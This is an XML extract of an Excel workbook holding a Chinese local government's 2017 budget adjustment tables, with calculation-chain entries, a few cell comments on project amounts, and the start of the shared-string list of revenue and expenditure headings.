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495" windowHeight="10335" tabRatio="919"/>
  </bookViews>
  <sheets>
    <sheet name="收支总表" sheetId="1" r:id="rId1"/>
    <sheet name="收入调整" sheetId="2" r:id="rId2"/>
    <sheet name="一般预算收入" sheetId="3" r:id="rId3"/>
    <sheet name="2017年支出调整项目 (2)" sheetId="4" r:id="rId4"/>
    <sheet name="政府性基金预算调整表" sheetId="5" r:id="rId5"/>
    <sheet name="中期预算支出调整汇总表" sheetId="8" r:id="rId6"/>
    <sheet name="地方政府债券资金安排表（附表1）" sheetId="9" r:id="rId7"/>
    <sheet name="2016年结转结余资金安排情况表（附表2）" sheetId="10" r:id="rId8"/>
    <sheet name="专项资金追加预算安排表（附表3）" sheetId="12" r:id="rId9"/>
    <sheet name="XNXSYMSQ" sheetId="24" state="hidden" r:id="rId10"/>
    <sheet name="EPMLXJTX" sheetId="25" state="hidden" r:id="rId11"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'2016年结转结余资金安排情况表（附表2）'!$A$4:$G$80</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'2017年支出调整项目 (2)'!$A$3:$E$183</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'专项资金追加预算安排表（附表3）'!$B$4:$J$173</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="3">'2017年支出调整项目 (2)'!$A$1:E182</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="2">一般预算收入!$A$1:H53</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="7">'2016年结转结余资金安排情况表（附表2）'!$1:4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="3">'2017年支出调整项目 (2)'!$1:3</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="0">收支总表!$1:4</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="8">'专项资金追加预算安排表（附表3）'!$1:4</definedName>
  </definedNames>
  <calcPr calcId="125725"/>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="A40" i="25"/>
  <c r="A39"/>
  <c r="A35"/>
  <c r="C34"/>
  <c r="C33"/>
  <c r="C32"/>
  <c r="A31"/>
  <c r="A30"/>
  <c r="C29"/>
  <c r="A29"/>
  <c r="A28"/>
  <c r="C27"/>
  <c r="A27"/>
  <c r="A26"/>
  <c r="A23"/>
  <c r="A16"/>
  <c r="A15"/>
  <c r="C10"/>
  <c r="C6"/>
  <c r="C4"/>
  <c r="A40" i="24"/>
  <c r="A39"/>
  <c r="A35"/>
  <c r="C34"/>
  <c r="C33"/>
  <c r="C32"/>
  <c r="A31"/>
  <c r="A30"/>
  <c r="C29"/>
  <c r="A29"/>
  <c r="A28"/>
  <c r="C27"/>
  <c r="A27"/>
  <c r="A26"/>
  <c r="A23"/>
  <c r="A16"/>
  <c r="A15"/>
  <c r="C10"/>
  <c r="C6"/>
  <c r="C4"/>
  <c r="H170" i="12"/>
  <c r="G170"/>
  <c r="F170"/>
  <c r="H167"/>
  <c r="G167"/>
  <c r="F167"/>
  <c r="G149"/>
  <c r="G148" s="1"/>
  <c r="H148"/>
  <c r="F148"/>
  <c r="H141"/>
  <c r="G141"/>
  <c r="F141"/>
  <c r="H120"/>
  <c r="G120"/>
  <c r="F120"/>
  <c r="H111"/>
  <c r="G111"/>
  <c r="F111"/>
  <c r="H98"/>
  <c r="G98"/>
  <c r="F98"/>
  <c r="H91"/>
  <c r="G91"/>
  <c r="F91"/>
  <c r="G86"/>
  <c r="G85" s="1"/>
  <c r="H85"/>
  <c r="F85"/>
  <c r="H80"/>
  <c r="G80"/>
  <c r="F80"/>
  <c r="G79"/>
  <c r="I77"/>
  <c r="G72"/>
  <c r="H70"/>
  <c r="F70"/>
  <c r="H64"/>
  <c r="G64"/>
  <c r="F64"/>
  <c r="H55"/>
  <c r="G55"/>
  <c r="F55"/>
  <c r="G39"/>
  <c r="G26"/>
  <c r="H9"/>
  <c r="H8"/>
  <c r="H7"/>
  <c r="F6"/>
  <c r="E6"/>
  <c r="B5" i="10"/>
  <c r="D17" i="9"/>
  <c r="D15"/>
  <c r="D12"/>
  <c r="D10"/>
  <c r="D8"/>
  <c r="D7"/>
  <c r="D6" s="1"/>
  <c r="D5" s="1"/>
  <c r="C28" i="8"/>
  <c r="C27"/>
  <c r="C26"/>
  <c r="C25"/>
  <c r="C24"/>
  <c r="C23"/>
  <c r="C22"/>
  <c r="C21"/>
  <c r="C20"/>
  <c r="C19"/>
  <c r="C18"/>
  <c r="C17"/>
  <c r="C16"/>
  <c r="C15"/>
  <c r="C6"/>
  <c r="C5" s="1"/>
  <c r="H24" i="5"/>
  <c r="H23"/>
  <c r="H22"/>
  <c r="H21"/>
  <c r="H20"/>
  <c r="H19"/>
  <c r="D19"/>
  <c r="H18"/>
  <c r="D18"/>
  <c r="H17"/>
  <c r="D17"/>
  <c r="H16"/>
  <c r="D16"/>
  <c r="H15"/>
  <c r="D15"/>
  <c r="H14"/>
  <c r="D14"/>
  <c r="H13"/>
  <c r="D13"/>
  <c r="H12"/>
  <c r="D12"/>
  <c r="H11"/>
  <c r="D11"/>
  <c r="H10"/>
  <c r="D10"/>
  <c r="H9"/>
  <c r="F9"/>
  <c r="D9"/>
  <c r="H8"/>
  <c r="D8"/>
  <c r="H7"/>
  <c r="D7"/>
  <c r="D6" s="1"/>
  <c r="D26" s="1"/>
  <c r="H6"/>
  <c r="H26" s="1"/>
  <c r="G6"/>
  <c r="G26" s="1"/>
  <c r="F6"/>
  <c r="F26" s="1"/>
  <c r="C6"/>
  <c r="C26" s="1"/>
  <c r="B6"/>
  <c r="B26" s="1"/>
  <c r="F25" s="1"/>
  <c r="H25" s="1"/>
  <c r="D177" i="4"/>
  <c r="D158"/>
  <c r="D154"/>
  <c r="D153"/>
  <c r="D152" s="1"/>
  <c r="D126"/>
  <c r="D122"/>
  <c r="D120" s="1"/>
  <c r="D116"/>
  <c r="D109"/>
  <c r="D106"/>
  <c r="D101"/>
  <c r="D95"/>
  <c r="D89"/>
  <c r="D88"/>
  <c r="D80"/>
  <c r="D76"/>
  <c r="D69"/>
  <c r="D68"/>
  <c r="D33"/>
  <c r="D32"/>
  <c r="D29"/>
  <c r="D22"/>
  <c r="D15"/>
  <c r="D13"/>
  <c r="D12"/>
  <c r="D10"/>
  <c r="D53" i="3"/>
  <c r="B53"/>
  <c r="D52"/>
  <c r="B52"/>
  <c r="E49"/>
  <c r="D49"/>
  <c r="C49"/>
  <c r="B49"/>
  <c r="F49" s="1"/>
  <c r="G49" s="1"/>
  <c r="E48"/>
  <c r="D48"/>
  <c r="D44" s="1"/>
  <c r="C48"/>
  <c r="B48"/>
  <c r="F48" s="1"/>
  <c r="G48" s="1"/>
  <c r="F47"/>
  <c r="G47" s="1"/>
  <c r="E47"/>
  <c r="D47"/>
  <c r="B47"/>
  <c r="E46"/>
  <c r="D46"/>
  <c r="C46"/>
  <c r="C44" s="1"/>
  <c r="B46"/>
  <c r="F46" s="1"/>
  <c r="G46" s="1"/>
  <c r="E45"/>
  <c r="D45"/>
  <c r="B45"/>
  <c r="F45" s="1"/>
  <c r="E44"/>
  <c r="E43"/>
  <c r="D43"/>
  <c r="B43"/>
  <c r="F43" s="1"/>
  <c r="G43" s="1"/>
  <c r="E42"/>
  <c r="D42"/>
  <c r="C42"/>
  <c r="B42"/>
  <c r="F42" s="1"/>
  <c r="G42" s="1"/>
  <c r="G41"/>
  <c r="F41"/>
  <c r="E41"/>
  <c r="E40" s="1"/>
  <c r="D41"/>
  <c r="B41"/>
  <c r="B40" s="1"/>
  <c r="D40"/>
  <c r="D50" s="1"/>
  <c r="C40"/>
  <c r="C50" s="1"/>
  <c r="E38"/>
  <c r="D38"/>
  <c r="C38"/>
  <c r="B38"/>
  <c r="F38" s="1"/>
  <c r="G38" s="1"/>
  <c r="F37"/>
  <c r="G37" s="1"/>
  <c r="E37"/>
  <c r="D37"/>
  <c r="C37"/>
  <c r="B37"/>
  <c r="B26" i="1" s="1"/>
  <c r="F26" s="1"/>
  <c r="F36" i="3"/>
  <c r="G36" s="1"/>
  <c r="E36"/>
  <c r="D36"/>
  <c r="C36"/>
  <c r="B36"/>
  <c r="E35"/>
  <c r="D35"/>
  <c r="C35"/>
  <c r="B35"/>
  <c r="F35" s="1"/>
  <c r="G35" s="1"/>
  <c r="E34"/>
  <c r="D34"/>
  <c r="C34"/>
  <c r="B34"/>
  <c r="F34" s="1"/>
  <c r="G34" s="1"/>
  <c r="F33"/>
  <c r="G33" s="1"/>
  <c r="E33"/>
  <c r="D33"/>
  <c r="C33"/>
  <c r="B33"/>
  <c r="F32"/>
  <c r="G32" s="1"/>
  <c r="E32"/>
  <c r="D32"/>
  <c r="C32"/>
  <c r="B32"/>
  <c r="E31"/>
  <c r="D31"/>
  <c r="C31"/>
  <c r="B31"/>
  <c r="F31" s="1"/>
  <c r="G31" s="1"/>
  <c r="E30"/>
  <c r="D30"/>
  <c r="C30"/>
  <c r="B30"/>
  <c r="F30" s="1"/>
  <c r="G30" s="1"/>
  <c r="F29"/>
  <c r="G29" s="1"/>
  <c r="E29"/>
  <c r="D29"/>
  <c r="C29"/>
  <c r="B29"/>
  <c r="F28"/>
  <c r="G28" s="1"/>
  <c r="E28"/>
  <c r="D28"/>
  <c r="C28"/>
  <c r="B28"/>
  <c r="E27"/>
  <c r="D27"/>
  <c r="C27"/>
  <c r="B27"/>
  <c r="F27" s="1"/>
  <c r="G27" s="1"/>
  <c r="E26"/>
  <c r="D26"/>
  <c r="C26"/>
  <c r="B26"/>
  <c r="F26" s="1"/>
  <c r="G26" s="1"/>
  <c r="F25"/>
  <c r="G25" s="1"/>
  <c r="E25"/>
  <c r="D25"/>
  <c r="C25"/>
  <c r="B25"/>
  <c r="F24"/>
  <c r="G24" s="1"/>
  <c r="E24"/>
  <c r="D24"/>
  <c r="D22" s="1"/>
  <c r="D21" s="1"/>
  <c r="C24"/>
  <c r="C22" s="1"/>
  <c r="C21" s="1"/>
  <c r="B24"/>
  <c r="E23"/>
  <c r="E22" s="1"/>
  <c r="D23"/>
  <c r="C23"/>
  <c r="B23"/>
  <c r="B22" s="1"/>
  <c r="F20"/>
  <c r="G20" s="1"/>
  <c r="E20"/>
  <c r="D20"/>
  <c r="C20"/>
  <c r="B20"/>
  <c r="B21" i="1" s="1"/>
  <c r="F21" s="1"/>
  <c r="E19" i="3"/>
  <c r="E20" i="1" s="1"/>
  <c r="C20" s="1"/>
  <c r="D19" i="3"/>
  <c r="C19"/>
  <c r="B19"/>
  <c r="F19" s="1"/>
  <c r="G19" s="1"/>
  <c r="E18"/>
  <c r="D18"/>
  <c r="C18"/>
  <c r="B18"/>
  <c r="F18" s="1"/>
  <c r="G18" s="1"/>
  <c r="F17"/>
  <c r="G17" s="1"/>
  <c r="E17"/>
  <c r="E18" i="1" s="1"/>
  <c r="C18" s="1"/>
  <c r="D17" i="3"/>
  <c r="C17"/>
  <c r="B17"/>
  <c r="F16"/>
  <c r="G16" s="1"/>
  <c r="E16"/>
  <c r="D16"/>
  <c r="C16"/>
  <c r="B16"/>
  <c r="E15"/>
  <c r="D15"/>
  <c r="C15"/>
  <c r="B15"/>
  <c r="F15" s="1"/>
  <c r="G15" s="1"/>
  <c r="E14"/>
  <c r="D14"/>
  <c r="C14"/>
  <c r="B14"/>
  <c r="B15" i="1" s="1"/>
  <c r="F15" s="1"/>
  <c r="F13" i="3"/>
  <c r="G13" s="1"/>
  <c r="E13"/>
  <c r="D13"/>
  <c r="C13"/>
  <c r="B13"/>
  <c r="B14" i="1" s="1"/>
  <c r="F14" s="1"/>
  <c r="F12" i="3"/>
  <c r="G12" s="1"/>
  <c r="E12"/>
  <c r="D12"/>
  <c r="C12"/>
  <c r="B12"/>
  <c r="B13" i="1" s="1"/>
  <c r="E11" i="3"/>
  <c r="D11"/>
  <c r="C11"/>
  <c r="B11"/>
  <c r="F11" s="1"/>
  <c r="G11" s="1"/>
  <c r="G10"/>
  <c r="F10"/>
  <c r="E10"/>
  <c r="D10"/>
  <c r="B10"/>
  <c r="B9"/>
  <c r="F9" s="1"/>
  <c r="G9" s="1"/>
  <c r="E8"/>
  <c r="D8"/>
  <c r="C8"/>
  <c r="B8"/>
  <c r="F8" s="1"/>
  <c r="G8" s="1"/>
  <c r="F7"/>
  <c r="G7" s="1"/>
  <c r="E7"/>
  <c r="E8" i="1" s="1"/>
  <c r="C8" s="1"/>
  <c r="D7" i="3"/>
  <c r="C7"/>
  <c r="B7"/>
  <c r="B8" i="1" s="1"/>
  <c r="F6" i="3"/>
  <c r="G6" s="1"/>
  <c r="F5"/>
  <c r="G5" s="1"/>
  <c r="E5"/>
  <c r="E4" s="1"/>
  <c r="D5"/>
  <c r="D4" s="1"/>
  <c r="D39" s="1"/>
  <c r="B5"/>
  <c r="C4"/>
  <c r="C39" s="1"/>
  <c r="H44" i="2"/>
  <c r="G44"/>
  <c r="E44"/>
  <c r="H43"/>
  <c r="G43"/>
  <c r="E43"/>
  <c r="G42"/>
  <c r="H42" s="1"/>
  <c r="E42"/>
  <c r="H41"/>
  <c r="G41"/>
  <c r="E41"/>
  <c r="G40"/>
  <c r="H40" s="1"/>
  <c r="E40"/>
  <c r="H39"/>
  <c r="G39"/>
  <c r="E39"/>
  <c r="G38"/>
  <c r="H38" s="1"/>
  <c r="E38"/>
  <c r="H37"/>
  <c r="G37"/>
  <c r="E37"/>
  <c r="H36"/>
  <c r="G36"/>
  <c r="E36"/>
  <c r="H35"/>
  <c r="G35"/>
  <c r="E35"/>
  <c r="D35"/>
  <c r="H34"/>
  <c r="G34"/>
  <c r="E34"/>
  <c r="G33"/>
  <c r="H33" s="1"/>
  <c r="E33"/>
  <c r="H32"/>
  <c r="G32"/>
  <c r="E32"/>
  <c r="H31"/>
  <c r="G31"/>
  <c r="G30" s="1"/>
  <c r="H30" s="1"/>
  <c r="E31"/>
  <c r="F30"/>
  <c r="D30"/>
  <c r="E30" s="1"/>
  <c r="C30"/>
  <c r="B30"/>
  <c r="F29"/>
  <c r="E53" i="3" s="1"/>
  <c r="D29" i="2"/>
  <c r="C29"/>
  <c r="C53" i="3" s="1"/>
  <c r="B29" i="2"/>
  <c r="E29" s="1"/>
  <c r="H28"/>
  <c r="G28"/>
  <c r="E28"/>
  <c r="G27"/>
  <c r="H27" s="1"/>
  <c r="E27"/>
  <c r="H26"/>
  <c r="G26"/>
  <c r="E26"/>
  <c r="G25"/>
  <c r="H25" s="1"/>
  <c r="E25"/>
  <c r="H24"/>
  <c r="G24"/>
  <c r="E24"/>
  <c r="H23"/>
  <c r="G23"/>
  <c r="E23"/>
  <c r="H22"/>
  <c r="G22"/>
  <c r="E22"/>
  <c r="G21"/>
  <c r="H21" s="1"/>
  <c r="E21"/>
  <c r="H20"/>
  <c r="G20"/>
  <c r="E20"/>
  <c r="G19"/>
  <c r="H19" s="1"/>
  <c r="E19"/>
  <c r="H18"/>
  <c r="G18"/>
  <c r="E18"/>
  <c r="G17"/>
  <c r="H17" s="1"/>
  <c r="E17"/>
  <c r="H16"/>
  <c r="G16"/>
  <c r="E16"/>
  <c r="H15"/>
  <c r="G15"/>
  <c r="E15"/>
  <c r="H14"/>
  <c r="G14"/>
  <c r="E14"/>
  <c r="G13"/>
  <c r="H13" s="1"/>
  <c r="H12"/>
  <c r="G12"/>
  <c r="E12"/>
  <c r="H11"/>
  <c r="G11"/>
  <c r="E11"/>
  <c r="F10"/>
  <c r="F45" s="1"/>
  <c r="E10"/>
  <c r="D10"/>
  <c r="C10"/>
  <c r="C52" i="3" s="1"/>
  <c r="B10" i="2"/>
  <c r="H9"/>
  <c r="G9"/>
  <c r="E9"/>
  <c r="H8"/>
  <c r="G8"/>
  <c r="E8"/>
  <c r="H7"/>
  <c r="G7"/>
  <c r="E7"/>
  <c r="G6"/>
  <c r="H6" s="1"/>
  <c r="E6"/>
  <c r="F5"/>
  <c r="E51" i="3" s="1"/>
  <c r="D5" i="2"/>
  <c r="D45" s="1"/>
  <c r="C5"/>
  <c r="C51" i="3" s="1"/>
  <c r="B5" i="2"/>
  <c r="B51" i="3" s="1"/>
  <c r="Q74" i="1"/>
  <c r="P74"/>
  <c r="M74"/>
  <c r="H74"/>
  <c r="F73"/>
  <c r="E73"/>
  <c r="F72"/>
  <c r="C72"/>
  <c r="F71"/>
  <c r="F70"/>
  <c r="E70"/>
  <c r="F69"/>
  <c r="E69"/>
  <c r="F68"/>
  <c r="E68"/>
  <c r="F67"/>
  <c r="E67"/>
  <c r="F66"/>
  <c r="E66"/>
  <c r="F65"/>
  <c r="E65"/>
  <c r="F64"/>
  <c r="E64"/>
  <c r="F63"/>
  <c r="E63"/>
  <c r="F62"/>
  <c r="E62"/>
  <c r="C61"/>
  <c r="E61" s="1"/>
  <c r="F60"/>
  <c r="E60"/>
  <c r="E59"/>
  <c r="C59"/>
  <c r="C51" s="1"/>
  <c r="F58"/>
  <c r="E58"/>
  <c r="F57"/>
  <c r="E57"/>
  <c r="F56"/>
  <c r="E56"/>
  <c r="F55"/>
  <c r="E55"/>
  <c r="F54"/>
  <c r="E54"/>
  <c r="F53"/>
  <c r="E53"/>
  <c r="F52"/>
  <c r="E52"/>
  <c r="D51"/>
  <c r="B51"/>
  <c r="F50"/>
  <c r="E50"/>
  <c r="F49"/>
  <c r="E49"/>
  <c r="F48"/>
  <c r="E48"/>
  <c r="F47"/>
  <c r="E47"/>
  <c r="F46"/>
  <c r="E46"/>
  <c r="F45"/>
  <c r="E45"/>
  <c r="F44"/>
  <c r="E44"/>
  <c r="F43"/>
  <c r="E43"/>
  <c r="F42"/>
  <c r="E42"/>
  <c r="F41"/>
  <c r="E41"/>
  <c r="F40"/>
  <c r="E40"/>
  <c r="W39"/>
  <c r="I39"/>
  <c r="F39"/>
  <c r="E39"/>
  <c r="F38"/>
  <c r="E38"/>
  <c r="C37"/>
  <c r="E37" s="1"/>
  <c r="E35" s="1"/>
  <c r="F36"/>
  <c r="E36"/>
  <c r="D35"/>
  <c r="B35"/>
  <c r="F34"/>
  <c r="W33"/>
  <c r="I33"/>
  <c r="C33"/>
  <c r="F33" s="1"/>
  <c r="I32"/>
  <c r="W32" s="1"/>
  <c r="C32"/>
  <c r="F32" s="1"/>
  <c r="W31"/>
  <c r="W29" s="1"/>
  <c r="I31"/>
  <c r="C31"/>
  <c r="F31" s="1"/>
  <c r="I30"/>
  <c r="W30" s="1"/>
  <c r="E30"/>
  <c r="D30"/>
  <c r="D29" s="1"/>
  <c r="D74" s="1"/>
  <c r="B30"/>
  <c r="V29"/>
  <c r="U29"/>
  <c r="T29"/>
  <c r="S29"/>
  <c r="S74" s="1"/>
  <c r="R29"/>
  <c r="Q29"/>
  <c r="P29"/>
  <c r="O29"/>
  <c r="O74" s="1"/>
  <c r="N29"/>
  <c r="M29"/>
  <c r="L29"/>
  <c r="K29"/>
  <c r="K74" s="1"/>
  <c r="J29"/>
  <c r="I29" s="1"/>
  <c r="H29"/>
  <c r="B29"/>
  <c r="X28"/>
  <c r="T28"/>
  <c r="T74" s="1"/>
  <c r="S28"/>
  <c r="R28"/>
  <c r="R74" s="1"/>
  <c r="Q28"/>
  <c r="P28"/>
  <c r="O28"/>
  <c r="N28"/>
  <c r="N74" s="1"/>
  <c r="M28"/>
  <c r="L28"/>
  <c r="L74" s="1"/>
  <c r="K28"/>
  <c r="J28"/>
  <c r="J74" s="1"/>
  <c r="H28"/>
  <c r="D28"/>
  <c r="Y27"/>
  <c r="W27"/>
  <c r="I27"/>
  <c r="E27"/>
  <c r="C27" s="1"/>
  <c r="B27"/>
  <c r="F27" s="1"/>
  <c r="W26"/>
  <c r="Y26" s="1"/>
  <c r="I26"/>
  <c r="E26"/>
  <c r="C26"/>
  <c r="I25"/>
  <c r="W25" s="1"/>
  <c r="Y25" s="1"/>
  <c r="E25"/>
  <c r="C25" s="1"/>
  <c r="F25" s="1"/>
  <c r="B25"/>
  <c r="W24"/>
  <c r="Y24" s="1"/>
  <c r="I24"/>
  <c r="E24"/>
  <c r="C24" s="1"/>
  <c r="V23"/>
  <c r="I23" s="1"/>
  <c r="W23" s="1"/>
  <c r="Y23" s="1"/>
  <c r="V22"/>
  <c r="U22"/>
  <c r="I22"/>
  <c r="W22" s="1"/>
  <c r="Y22" s="1"/>
  <c r="D22"/>
  <c r="W21"/>
  <c r="I21"/>
  <c r="E21"/>
  <c r="C21" s="1"/>
  <c r="W20"/>
  <c r="I20"/>
  <c r="I19"/>
  <c r="W19" s="1"/>
  <c r="Y19" s="1"/>
  <c r="E19"/>
  <c r="C19" s="1"/>
  <c r="B19"/>
  <c r="U18"/>
  <c r="I18"/>
  <c r="W18" s="1"/>
  <c r="Y18" s="1"/>
  <c r="B18"/>
  <c r="V17"/>
  <c r="U17"/>
  <c r="I17" s="1"/>
  <c r="W17" s="1"/>
  <c r="Y17" s="1"/>
  <c r="E17"/>
  <c r="C17"/>
  <c r="B17"/>
  <c r="F17" s="1"/>
  <c r="V16"/>
  <c r="I16" s="1"/>
  <c r="W16" s="1"/>
  <c r="Y16" s="1"/>
  <c r="U16"/>
  <c r="E16"/>
  <c r="C16" s="1"/>
  <c r="V15"/>
  <c r="U15"/>
  <c r="I15" s="1"/>
  <c r="W15" s="1"/>
  <c r="Y15" s="1"/>
  <c r="E15"/>
  <c r="C15" s="1"/>
  <c r="U14"/>
  <c r="I14" s="1"/>
  <c r="W14" s="1"/>
  <c r="Y14" s="1"/>
  <c r="E14"/>
  <c r="C14" s="1"/>
  <c r="U13"/>
  <c r="I13" s="1"/>
  <c r="W13" s="1"/>
  <c r="Y13" s="1"/>
  <c r="E13"/>
  <c r="C13" s="1"/>
  <c r="U12"/>
  <c r="I12" s="1"/>
  <c r="W12" s="1"/>
  <c r="Y12" s="1"/>
  <c r="E12"/>
  <c r="C12" s="1"/>
  <c r="V11"/>
  <c r="U11"/>
  <c r="I11"/>
  <c r="W11" s="1"/>
  <c r="Y11" s="1"/>
  <c r="E11"/>
  <c r="C11" s="1"/>
  <c r="F11" s="1"/>
  <c r="B11"/>
  <c r="V10"/>
  <c r="I10"/>
  <c r="W10" s="1"/>
  <c r="Y10" s="1"/>
  <c r="E10"/>
  <c r="C10" s="1"/>
  <c r="U9"/>
  <c r="I9"/>
  <c r="W9" s="1"/>
  <c r="Y9" s="1"/>
  <c r="E9"/>
  <c r="C9" s="1"/>
  <c r="F9" s="1"/>
  <c r="B9"/>
  <c r="V8"/>
  <c r="U8"/>
  <c r="U28" s="1"/>
  <c r="U74" s="1"/>
  <c r="V7"/>
  <c r="V28" s="1"/>
  <c r="V74" s="1"/>
  <c r="E7"/>
  <c r="C7"/>
  <c r="F7" s="1"/>
  <c r="B7"/>
  <c r="W6"/>
  <c r="I6"/>
  <c r="E6"/>
  <c r="C6" s="1"/>
  <c r="B6"/>
  <c r="V5"/>
  <c r="U5"/>
  <c r="I5"/>
  <c r="W5" s="1"/>
  <c r="D5"/>
  <c r="C11" i="24"/>
  <c r="C12" i="25"/>
  <c r="C11"/>
  <c r="C12" i="24"/>
  <c r="Y5" i="1" l="1"/>
  <c r="W28"/>
  <c r="B21" i="3"/>
  <c r="B23" i="1"/>
  <c r="F44" i="3"/>
  <c r="G44" s="1"/>
  <c r="G45"/>
  <c r="F51" i="1"/>
  <c r="E51"/>
  <c r="E29" s="1"/>
  <c r="F13"/>
  <c r="F35"/>
  <c r="D9" i="4"/>
  <c r="F19" i="1"/>
  <c r="F40" i="3"/>
  <c r="F8" i="1"/>
  <c r="C5"/>
  <c r="F6"/>
  <c r="E23"/>
  <c r="E21" i="3"/>
  <c r="E39" s="1"/>
  <c r="E50" s="1"/>
  <c r="F18" i="1"/>
  <c r="F30"/>
  <c r="G10" i="2"/>
  <c r="I8" i="1"/>
  <c r="W8" s="1"/>
  <c r="Y8" s="1"/>
  <c r="I28"/>
  <c r="I74" s="1"/>
  <c r="B20"/>
  <c r="F20" s="1"/>
  <c r="B4" i="3"/>
  <c r="B39" s="1"/>
  <c r="B50" s="1"/>
  <c r="E5" i="1"/>
  <c r="B16"/>
  <c r="F16" s="1"/>
  <c r="C30"/>
  <c r="C29" s="1"/>
  <c r="F14" i="3"/>
  <c r="G14" s="1"/>
  <c r="D51"/>
  <c r="D8" i="4"/>
  <c r="B12" i="1"/>
  <c r="F12" s="1"/>
  <c r="B24"/>
  <c r="F24" s="1"/>
  <c r="F59"/>
  <c r="G5" i="2"/>
  <c r="E52" i="3"/>
  <c r="B45" i="2"/>
  <c r="G45" s="1"/>
  <c r="I7" i="1"/>
  <c r="W7" s="1"/>
  <c r="Y7" s="1"/>
  <c r="G29" i="2"/>
  <c r="F23" i="3"/>
  <c r="B44"/>
  <c r="E5" i="2"/>
  <c r="F4" i="3"/>
  <c r="G4" s="1"/>
  <c r="B10" i="1"/>
  <c r="F10" s="1"/>
  <c r="C35"/>
  <c r="F37"/>
  <c r="F61"/>
  <c r="C45" i="2"/>
  <c r="G6" i="12"/>
  <c r="H6"/>
  <c r="H5" s="1"/>
  <c r="G70"/>
  <c r="F5"/>
  <c r="C14" i="8"/>
  <c r="C4" s="1"/>
  <c r="D4" i="4" s="1"/>
  <c r="H5" i="2" l="1"/>
  <c r="F51" i="3"/>
  <c r="G51" s="1"/>
  <c r="Y28" i="1"/>
  <c r="H10" i="2"/>
  <c r="F52" i="3"/>
  <c r="G52" s="1"/>
  <c r="C28" i="1"/>
  <c r="C74" s="1"/>
  <c r="F5"/>
  <c r="F28" s="1"/>
  <c r="B22"/>
  <c r="F23"/>
  <c r="F22" s="1"/>
  <c r="F53" i="3"/>
  <c r="G53" s="1"/>
  <c r="H29" i="2"/>
  <c r="C23" i="1"/>
  <c r="C22" s="1"/>
  <c r="E22"/>
  <c r="E28" s="1"/>
  <c r="E74" s="1"/>
  <c r="F29"/>
  <c r="H45" i="2"/>
  <c r="F21" i="3"/>
  <c r="G21" s="1"/>
  <c r="E45" i="2"/>
  <c r="G23" i="3"/>
  <c r="F22"/>
  <c r="G22" s="1"/>
  <c r="G40"/>
  <c r="F39"/>
  <c r="G39" s="1"/>
  <c r="B5" i="1"/>
  <c r="B28" s="1"/>
  <c r="B74" s="1"/>
  <c r="F74" l="1"/>
  <c r="W41" s="1"/>
  <c r="W74" s="1"/>
  <c r="X74" s="1"/>
  <c r="F50" i="3"/>
  <c r="G50" s="1"/>
</calcChain>
</file>

<file path=xl/comments1.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>微软用户</author>
  </authors>
  <commentList>
    <comment ref="V18" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>微软用户:
金铜项目5180万元，年初已安排5000万元</t>
        </r>
      </text>
    </comment>
    <comment ref="V27" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>微软用户:
债务还本付息，不含金黄色铜项目5180万元</t>
        </r>
      </text>
    </comment>
    <comment ref="B65" authorId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="宋体"/>
            <charset val="134"/>
          </rPr>
          <t>wzx:
一事一议1029万元</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1159" uniqueCount="807">
  <si>
    <t>单位：万元</t>
  </si>
  <si>
    <t>收                          入</t>
  </si>
  <si>
    <t>支                          出</t>
  </si>
  <si>
    <t>2016年1-9月已支出</t>
  </si>
  <si>
    <t>占预算比</t>
  </si>
  <si>
    <t>项          目</t>
  </si>
  <si>
    <t>预算数</t>
  </si>
  <si>
    <t>增减（+、-）</t>
  </si>
  <si>
    <t>上级专款</t>
  </si>
  <si>
    <t>预算调整</t>
  </si>
  <si>
    <t>增减后预算数</t>
  </si>
  <si>
    <t>上年结转</t>
  </si>
  <si>
    <t>动支预备费</t>
  </si>
  <si>
    <t>一般转移支付</t>
  </si>
  <si>
    <t>资源枯竭增资</t>
  </si>
  <si>
    <t>债券资金</t>
  </si>
  <si>
    <t>年初预留缺口</t>
  </si>
  <si>
    <t>非税返还</t>
  </si>
  <si>
    <t>工资津补贴提标</t>
  </si>
  <si>
    <t>税收返还</t>
  </si>
  <si>
    <t>国有资产返还</t>
  </si>
  <si>
    <t>结转结余项目再次安排</t>
  </si>
  <si>
    <t>其他项目预算调整</t>
  </si>
  <si>
    <t>一、税收收入</t>
  </si>
  <si>
    <t>一、一般公共服务</t>
  </si>
  <si>
    <t xml:space="preserve">    增值税</t>
  </si>
  <si>
    <t>二、外交</t>
  </si>
  <si>
    <t xml:space="preserve">    消费税</t>
  </si>
  <si>
    <t>三、国防</t>
  </si>
  <si>
    <t xml:space="preserve">    企业所得税</t>
  </si>
  <si>
    <t>四、公共安全</t>
  </si>
  <si>
    <t xml:space="preserve">    个人所得税</t>
  </si>
  <si>
    <t>五、教育</t>
  </si>
  <si>
    <t xml:space="preserve">    企业所得税退税</t>
  </si>
  <si>
    <t>六、科学技术</t>
  </si>
  <si>
    <t xml:space="preserve">    营业税</t>
  </si>
  <si>
    <t>七、文化体育与传媒</t>
  </si>
  <si>
    <t xml:space="preserve">    资源税</t>
  </si>
  <si>
    <t>八、社会保障和就业</t>
  </si>
  <si>
    <t xml:space="preserve">    城市维护建设税</t>
